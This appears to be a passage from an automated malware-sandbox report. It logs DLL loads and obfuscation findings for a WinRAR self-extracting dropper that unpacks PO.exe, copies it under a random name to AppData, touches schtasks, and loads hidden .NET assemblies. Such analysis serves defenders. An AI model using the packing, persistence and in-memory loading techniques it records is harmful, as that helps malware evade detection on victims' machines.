                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: w4XFffGDz1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: PO.exe.0.dr, MainForm.cs.Net Code: InitializeComponent
                      Source: AJzHYZtQIb.exe.7.dr, MainForm.cs.Net Code: InitializeComponent
                      Source: 7.2.PO.exe.29ee27c.0.raw.unpack, LoginForm.cs.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])
                      Source: 7.2.PO.exe.7770000.7.raw.unpack, LoginForm.cs.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6362281Jump to behavior
                      Source: w4XFffGDz1.exeStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018C403 push ecx; ret
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D4B0 push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697E5CF push es; ret
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA9695 push FFFFFF8Bh; iretd
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D48D0B push esp; retf
                      Source: PO.exe.0.drStatic PE information: section name: .text entropy: 7.616094055788291
                      Source: AJzHYZtQIb.exe.7.drStatic PE information: section name: .text entropy: 7.616094055788291
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, vDrWgAuv05qGryjBLgI.csHigh entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, p7yy0t7M82Hmx79AfL.csHigh entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, q72tq2ximplPDGFyoN.csHigh entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, ocaowhuM8mELpeCg1ig.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, S4G9XnevepCQioK3is.csHigh entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, IcmTCBLlejKLSTLxHH.csHigh entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, lBVadcz5bviu8jxc7G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, rmFfbhZkpQQsFEbfol.csHigh entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, zFBqeEjRFBLSRfwf0A.csHigh entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, eQO0SCdvWMrQTMtdfV.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, qQX0XtkHmUSEBYI1Ue.csHigh entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Bvw1RBceaN523NPJik.csHigh entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, oVpml5PMcJ46Alhh5x.csHigh entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, j7TAQmhL1SaPlhQ8HW.csHigh entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csHigh entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.csHigh entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, LJTjbSmSH66JQvrsi3.csHigh entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, xcI1enoJkXBKDmiAdr.csHigh entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, X5ql3I12sxhVIpAQQo.csHigh entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Psiccf4bVvVDkx6mSI.csHigh entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.csHigh entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, pLG4Ea5tVQMslBLeve.csHigh entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, vDrWgAuv05qGryjBLgI.csHigh entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, p7yy0t7M82Hmx79AfL.csHigh entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, q72tq2ximplPDGFyoN.csHigh entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, ocaowhuM8mELpeCg1ig.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, S4G9XnevepCQioK3is.csHigh entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, IcmTCBLlejKLSTLxHH.csHigh entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, lBVadcz5bviu8jxc7G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
